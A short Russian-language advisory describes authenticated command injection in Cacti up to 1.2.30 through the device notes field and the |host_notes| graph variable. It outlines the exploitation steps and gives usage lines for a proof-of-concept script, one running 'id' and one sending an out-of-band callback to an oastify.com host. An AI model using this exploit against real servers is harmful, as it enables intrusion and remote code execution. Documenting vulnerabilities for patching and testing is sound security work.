
Cacti ≤ 1.2.30 Auth RCE - Внедрение переменной хоста
Уязвимость внедрения команд ОС в Cacti ≤ 1.2.30 позволяет любому аутентифицированному пользователю с правами на создание устройств и графических шаблонов выполнять произвольные команды на базовом сервере. Ошибка возникает из-за того, что управляемые пользователем поля метаданных хоста (в частности, поле заметок устройства) подставляются в аргументы командной строки RRDtool через механизм замены переменных Cacti без какой-либо санитизации или экранирования. Злоумышленник может внедрить метасимволы оболочки в поле заметок, создать шаблон графика, ссылающийся на переменную |host_notes|, и запустить рендеринг графика для полного удаленного выполнения кода от имени пользователя веб-сервера.
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
Выполнение команды OOB:
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com

